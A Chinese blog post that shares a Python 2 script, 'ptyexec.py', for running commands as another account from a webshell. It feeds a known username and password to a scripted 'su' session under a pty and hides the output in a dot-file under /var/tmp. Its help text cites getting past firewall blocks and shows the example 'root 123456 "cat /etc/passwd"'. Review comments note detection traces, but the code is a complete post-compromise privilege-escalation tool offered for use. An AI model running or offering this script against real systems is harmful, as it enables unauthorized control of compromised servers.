一个在已知帐户名和密码的情况下,于 Webshell 中执行命令的脚本


作者:xi4oyu

新站开张,放出来吧。以前是应包总之约写的。前后也没给过几个人,算是个伪私有版。

#!/usr/bin/env python
#For God sake, Keep it priv4t3

import sys,os,time,pty
def usage():
    """Print the command-line help text and exit with status 0.

    The example line in the help text passes the account password as a
    plain command-line argument, which is how the script expects it.
    """
    help_lines = (
        "ptyexec.py: fuck the firewall block up",
        "By xi4oyu http://www.pentestday.com",
        "Usage: ptyexec.py <username> <passwd> <command>",
        'Ext: ptyexec.py root 123456 "cat /etc/passwd"',
        'Result will be located in /var/tmp',
    )
    for text in help_lines:
        # Single-argument parenthesised print behaves the same as the
        # print statement used elsewhere in this Python 2 script.
        print(text)
    sys.exit(0)

def fuck_child(pipein):
    """Run /bin/sh under a pty, fed from a pipe, logging to /var/tmp.

    Args:
        pipein: read end of the pipe created by the caller; it becomes
            this process's standard input.

    Standard output and standard error are both pointed at
    /var/tmp/.result.txt, opened in append mode. Nothing in this script
    truncates or removes that file, so everything the spawned shell
    prints accumulates there across runs.

    NOTE(review): the dot-prefixed file in /var/tmp, created by whatever
    account runs this script, is a durable on-disk artifact for
    incident responders to look for.

    This function does not return: it ends the process with exit
    status 0 once pty.spawn() comes back.
    """
    # fd 0 <- pipe: whatever the parent writes becomes the shell's input.
    os.dup2(pipein, 0)

    result_log = open("/var/tmp/.result.txt", "a")
    log_fd = result_log.fileno()
    # fd 1 and fd 2 <- result file, so stdout and stderr are both captured.
    for std_fd in (1, 2):
        os.dup2(log_fd, std_fd)

    pty.spawn("/bin/sh")

    # stdout was redirected above, so this line also lands in the result file.
    print("GAGA..I'm back,Alt it never be happened")
    sys.exit(0)

def fuck_it_up(user, passwd, command):
    """Fork a pty-backed shell and feed it a scripted `su` session.

    Args:
        user: account name placed after ``su - `` on the first line.
        passwd: text sent as the second line.
        command: text sent as the third line.

    The child process runs fuck_child() on the read end of a pipe. The
    parent then writes four lines into the write end (``su - <user>``,
    the password, the command and ``exit``), sleeping two seconds before
    each write and once more before exiting with status 0. The lines are
    sent on a fixed timer; the parent never reads the shell's output, so
    nothing here confirms that a prompt was shown or that authentication
    succeeded.

    NOTE(review): every run makes an interactive-style ``su`` attempt
    from the invoking account. On typical Linux systems such attempts
    are recorded by the authentication log, and ``su`` launched beneath
    a web-server account is a strong detection signal (confirm against
    the host's logging configuration).
    """
    read_end, write_end = os.pipe()

    if os.fork() == 0:
        # Child: hands over to the pty shell and exits inside fuck_child().
        fuck_child(read_end)
    else:
        scripted_input = (
            ('su - %s\n', user),
            ('%s\n', passwd),
            ('%s\n', command),
        )
        for template, value in scripted_input:
            time.sleep(2)
            os.write(write_end, template % value)
        time.sleep(2)
        os.write(write_end, 'exit\n')
        time.sleep(2)
        sys.exit(0)

if __name__ == "__main__":
    # Exactly three positional arguments are required: username, password
    # and command. Anything else prints the help text, which exits.
    # NOTE(review): the password arrives as a command-line argument, so it
    # is exposed to anything able to read this process's command line
    # (process listings, execve audit records, shell history).
    cli_args = sys.argv[1:]
    if len(cli_args) != 3:
        usage()
    fuck_it_up(*cli_args)